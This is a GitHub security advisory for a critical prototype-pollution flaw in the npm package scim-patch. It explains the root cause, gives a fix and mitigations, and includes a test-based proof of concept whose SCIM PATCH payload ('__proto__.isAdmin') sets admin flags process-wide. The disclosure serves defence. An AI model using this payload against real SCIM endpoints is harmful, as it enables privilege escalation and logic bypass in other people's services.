GHSA-9M6G-WC8R-Q59C
Vulnerability from github – Published: 2026-06-22 22:57 – Updated: 2026-06-22 22:57Summary
scim-patch performs prototype pollution when applying a SCIM PATCH operation whose value object contains a key like "__proto__.someProp". After one such patch,
Object.prototype.someProp is set process-wide, affecting every plain object in the Node process.
Any service that calls scimPatch() on attacker-controlled JSON (i.e. any SCIM endpoint accepting PATCH from an external IdP) is exploitable on a stock Node runtime.
Impact
- Class: Prototype pollution (CWE-1321)
- Affected versions:
<= 0.9.0(current HEAD871b1e2) - Attack vector: Network — sent as part of a normal SCIM
PATCH /Users/:idrequest body. - Privileges required: Whatever the SCIM endpoint requires. For most integrations that's a provisioned IdP, which is "low" in CVSS terms (any authenticated provisioning client).
- Scope: Changed — the bug is in a SCIM library but the side effect (
Object.prototypemutation) leaks into the entire Node process.
Downstream consequences depend on what other code reads from plain objects. Realistic outcomes observed in similar bugs:
- Privilege escalation if any auth/middleware code checks actor.isAdmin / req.user.admin / similar boolean flags against a plain object that expects the key to be absent.
- Logic bypass / DoS if any code branches on obj.name, obj.type, obj.id etc. against plain objects (e.g. pg's prepared-statement naming check — a real incident at one consumer).
- Persistence: lasts until the Node process restarts, so the blast radius is every request that container handles after the pollution.
Root cause
In src/scimPatch.ts:415-427, addOrReplaceObjectAttribute iterates the user-supplied patch.value with Object.entries and feeds each key to resolvePaths, which splits on .:
function addOrReplaceObjectAttribute(property: any, patch: ScimPatchAddReplaceOperation, multiValuedPathFilter?: boolean): any {
if (typeof patch.value !== 'object') { ... }
// src/scimPatch.ts:423-427
for (const [key, value] of Object.entries(patch.value)) {
assign(property, resolvePaths(key), value, patch.op);
}
return property;
}
assign then walks the resulting key path with no filtering on dangerous keys (src/scimPatch.ts:437-445):
function assign(obj: any, keyPath: Array<string>, value: any, op: string) {
const lastKeyIndex = keyPath.length - 1;
for (let i = 0; i < lastKeyIndex; ++i) {
const key = keyPath[i];
if (!(key in obj)) {
obj[key] = {};
}
obj = obj[key]; // ← obj["__proto__"] === Object.prototype
}
// ... assigns into Object.prototype
}
For keyPath = ["__proto__", "polluted"]:
- "__proto__" in obj is always true, so the fresh-object branch is skipped.
- obj = obj["__proto__"] now points to Object.prototype.
- The final write lands on Object.prototype.polluted.
The same shape works for constructor.prototype keys.
Proof of concept
Drop this in test/prototypePollution.test.ts and run npm run build && npx mocha lib/test/prototypePollution.test.js. Both tests pass against HEAD 871b1e2:
import { scimPatch } from '../src/scimPatch';
import { ScimUser } from './types/types.test';
import { expect } from 'chai';
describe('Prototype pollution via scim-patch', () => {
let scimUser: ScimUser;
beforeEach(() => {
scimUser = JSON.parse(`{
"schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
"id": "tea_4",
"userName": "spiderman",
"name": { "familyName": "Parker", "givenName": "Peter" },
"active": true,
"emails": [{ "value": "spiderman@superheroes.com", "primary": true }],
"roles": [],
"meta": { "resourceType": "User", "created": "x", "lastModified": "x", "location": "x" }
}`);
});
afterEach(() => {
delete (Object.prototype as any).polluted;
delete (Object.prototype as any).isAdmin;
});
it('pollutes Object.prototype via a value-key containing __proto__', () => {
expect(({} as any).polluted).to.equal(undefined);
scimPatch(scimUser, [{
op: 'add',
path: 'name',
value: { '__proto__.polluted': 'yes' }
}]);
expect((Object.prototype as any).polluted).to.equal('yes');
expect(({} as any).polluted).to.equal('yes');
});
it('elevates Object.prototype.isAdmin — the admin-escalation shape', () => {
expect(({} as any).isAdmin).to.equal(undefined);
scimPatch(scimUser, [{
op: 'add',
path: 'name',
value: { '__proto__.isAdmin': true }
}]);
expect((Object.prototype as any).isAdmin).to.equal(true);
expect(({} as any).isAdmin).to.equal(true);
});
});
Suggested fix
Reject the three dangerous keys in assign() before the walk. Minimal patch:
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function assign(obj: any, keyPath: Array<string>, value: any, op: string) {
for (const key of keyPath) {
if (DANGEROUS_KEYS.has(key)) {
throw new InvalidScimPatchOp(`Forbidden key in patch path: ${key}`);
}
}
// ... existing logic
}
Alternative, slightly safer: switch the walk target to Object.create(null) nodes when creating intermediate objects, and use Object.defineProperty(obj, key, { value, enumerable: true, configurable: true, writable: true }) instead of obj[key] = value for the final write. That defends against future prototype-walking sinks even if a key sneaks past the denylist.
Either approach is a non-breaking change — legitimate SCIM clients never send these keys.
Mitigation for consumers who can't upgrade immediately
Calling Object.freeze(Object.prototype) (and the same on Array.prototype, Function.prototype) at process startup neutralizes this class of bug — assignment to a frozen prototype becomes a silent no-op in sloppy mode or a TypeError in strict mode. Node's --frozen-intrinsics flag does this for built-ins automatically.
Credit
Discovered by Lee Wang (Notion). Reported by David Wu (Notion).
Report authored by Claude. Reviewed by David Wu.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.0"
},
"package": {
"ecosystem": "npm",
"name": "scim-patch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48170"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T22:57:48Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\n`scim-patch` performs prototype pollution when applying a SCIM PATCH operation whose `value` object contains a key like `\"__proto__.someProp\"`. After one such patch,\n`Object.prototype.someProp` is set process-wide, affecting every plain object in the Node process.\n\nAny service that calls `scimPatch()` on attacker-controlled JSON (i.e. any SCIM endpoint accepting `PATCH` from an external IdP) is exploitable on a stock Node runtime.\n\n## Impact\n\n- **Class:** Prototype pollution ([CWE-1321](https://cwe.mitre.org/data/definitions/1321.html))\n- **Affected versions:** `\u003c= 0.9.0` (current HEAD `871b1e2`)\n- **Attack vector:** Network \u2014 sent as part of a normal SCIM `PATCH /Users/:id` request body.\n- **Privileges required:** Whatever the SCIM endpoint requires. For most integrations that\u0027s a provisioned IdP, which is \"low\" in CVSS terms (any authenticated provisioning client).\n- **Scope:** Changed \u2014 the bug is in a SCIM library but the side effect (`Object.prototype` mutation) leaks into the entire Node process.\n\nDownstream consequences depend on what other code reads from plain objects. Realistic outcomes observed in similar bugs:\n- **Privilege escalation** if any auth/middleware code checks `actor.isAdmin` / `req.user.admin` / similar boolean flags against a plain object that *expects* the key to be absent.\n- **Logic bypass / DoS** if any code branches on `obj.name`, `obj.type`, `obj.id` etc. against plain objects (e.g. `pg`\u0027s prepared-statement naming check \u2014 a real incident at one consumer).\n- **Persistence:** lasts until the Node process restarts, so the blast radius is *every* request that container handles after the pollution.\n\n## Root cause\n\nIn `src/scimPatch.ts:415-427`, `addOrReplaceObjectAttribute` iterates the user-supplied `patch.value` with `Object.entries` and feeds each key to `resolvePaths`, which splits on `.`:\n\n```ts\nfunction addOrReplaceObjectAttribute(property: any, patch: ScimPatchAddReplaceOperation, multiValuedPathFilter?: boolean): any {\n if (typeof patch.value !== \u0027object\u0027) { ... }\n\n // src/scimPatch.ts:423-427\n for (const [key, value] of Object.entries(patch.value)) {\n assign(property, resolvePaths(key), value, patch.op);\n }\n return property;\n}\n```\n\n`assign` then walks the resulting key path with no filtering on dangerous keys (`src/scimPatch.ts:437-445`):\n\n```ts\nfunction assign(obj: any, keyPath: Array\u003cstring\u003e, value: any, op: string) {\n const lastKeyIndex = keyPath.length - 1;\n for (let i = 0; i \u003c lastKeyIndex; ++i) {\n const key = keyPath[i];\n if (!(key in obj)) {\n obj[key] = {};\n }\n obj = obj[key]; // \u2190 obj[\"__proto__\"] === Object.prototype\n }\n // ... assigns into Object.prototype\n}\n```\n\nFor `keyPath = [\"__proto__\", \"polluted\"]`:\n- `\"__proto__\" in obj` is always true, so the fresh-object branch is skipped.\n- `obj = obj[\"__proto__\"]` now points to `Object.prototype`.\n- The final write lands on `Object.prototype.polluted`.\n\nThe same shape works for `constructor.prototype` keys.\n\n## Proof of concept\n\nDrop this in `test/prototypePollution.test.ts` and run `npm run build \u0026\u0026 npx mocha lib/test/prototypePollution.test.js`. Both tests pass against HEAD `871b1e2`:\n\n```ts\nimport { scimPatch } from \u0027../src/scimPatch\u0027;\nimport { ScimUser } from \u0027./types/types.test\u0027;\nimport { expect } from \u0027chai\u0027;\n\ndescribe(\u0027Prototype pollution via scim-patch\u0027, () =\u003e {\n let scimUser: ScimUser;\n\n beforeEach(() =\u003e {\n scimUser = JSON.parse(`{\n \"schemas\": [\"urn:ietf:params:scim:schemas:core:2.0:User\"],\n \"id\": \"tea_4\",\n \"userName\": \"spiderman\",\n \"name\": { \"familyName\": \"Parker\", \"givenName\": \"Peter\" },\n \"active\": true,\n \"emails\": [{ \"value\": \"spiderman@superheroes.com\", \"primary\": true }],\n \"roles\": [],\n \"meta\": { \"resourceType\": \"User\", \"created\": \"x\", \"lastModified\": \"x\", \"location\": \"x\" }\n }`);\n });\n\n afterEach(() =\u003e {\n delete (Object.prototype as any).polluted;\n delete (Object.prototype as any).isAdmin;\n });\n\n it(\u0027pollutes Object.prototype via a value-key containing __proto__\u0027, () =\u003e {\n expect(({} as any).polluted).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: \u0027add\u0027,\n path: \u0027name\u0027,\n value: { \u0027__proto__.polluted\u0027: \u0027yes\u0027 }\n }]);\n\n expect((Object.prototype as any).polluted).to.equal(\u0027yes\u0027);\n expect(({} as any).polluted).to.equal(\u0027yes\u0027);\n });\n\n it(\u0027elevates Object.prototype.isAdmin \u2014 the admin-escalation shape\u0027, () =\u003e {\n expect(({} as any).isAdmin).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: \u0027add\u0027,\n path: \u0027name\u0027,\n value: { \u0027__proto__.isAdmin\u0027: true }\n }]);\n\n expect((Object.prototype as any).isAdmin).to.equal(true);\n expect(({} as any).isAdmin).to.equal(true);\n });\n});\n```\n\n## Suggested fix\n\nReject the three dangerous keys in `assign()` before the walk. Minimal patch:\n\n```ts\nconst DANGEROUS_KEYS = new Set([\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]);\n\nfunction assign(obj: any, keyPath: Array\u003cstring\u003e, value: any, op: string) {\n for (const key of keyPath) {\n if (DANGEROUS_KEYS.has(key)) {\n throw new InvalidScimPatchOp(`Forbidden key in patch path: ${key}`);\n }\n }\n // ... existing logic\n}\n```\n\nAlternative, slightly safer: switch the walk target to `Object.create(null)` nodes when creating intermediate objects, and use `Object.defineProperty(obj, key, { value, enumerable: true, configurable: true, writable: true })` instead of `obj[key] = value` for the final write. That defends against future prototype-walking sinks even if a key sneaks past the denylist.\n\nEither approach is a non-breaking change \u2014 legitimate SCIM clients never send these keys.\n\n## Mitigation for consumers who can\u0027t upgrade immediately\n\nCalling `Object.freeze(Object.prototype)` (and the same on `Array.prototype`, `Function.prototype`) at process startup neutralizes this class of bug \u2014 assignment to a frozen prototype becomes a silent no-op in sloppy mode or a `TypeError` in strict mode. Node\u0027s `--frozen-intrinsics` flag does this for built-ins automatically.\n\n## Credit\n\nDiscovered by **Lee Wang (Notion)**. Reported by **David Wu (Notion)**.\n\nReport authored by **Claude**. Reviewed by **David Wu**.",
"id": "GHSA-9m6g-wc8r-q59c",
"modified": "2026-06-22T22:57:48Z",
"published": "2026-06-22T22:57:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thomaspoignant/scim-patch/security/advisories/GHSA-9m6g-wc8r-q59c"
},
{
"type": "WEB",
"url": "https://github.com/thomaspoignant/scim-patch/commit/260f9cd2ac5ceac3976978850bb47dcb391720f6"
},
{
"type": "PACKAGE",
"url": "https://github.com/thomaspoignant/scim-patch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "scimPatch vulnerable to prototype pollution via unfiltered keys in patch"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.